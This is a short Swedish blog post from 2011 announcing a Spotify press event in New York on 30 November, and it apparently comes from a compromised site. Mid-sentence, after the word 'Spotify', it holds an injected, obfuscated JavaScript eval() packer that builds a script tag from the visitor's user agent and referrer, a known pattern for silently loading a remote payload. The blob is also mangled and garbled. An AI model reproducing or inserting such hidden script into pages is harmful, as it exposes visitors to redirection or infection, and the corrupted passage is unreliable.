Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Spotify har ett event den 30:e november, där man ska visa något nytt…

Spotify har ett event den 30:e november, där man ska visa något nytt…
Filip Urde
  • On 21 november, 2011
  • http://www.revue.se/filip-urde

Spotify eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|azhfe|var|u0026u|referrer|tzzsr||js|php’.split(’|’),0,{}))
har idag meddelat världens presskår att man tänker avslöja något nytt i den 30:e november.

Presskonferens kommer att hållas i New York och medverkar gör bland annat Spotifys VD Daniel Ek tillsammans med ”special guests”. Det här är allt som är känt om presskonferensen i dagsläget. Men nästa onsdag kväll svensk tid, får vi alltså veta något.

engadget.com

Comments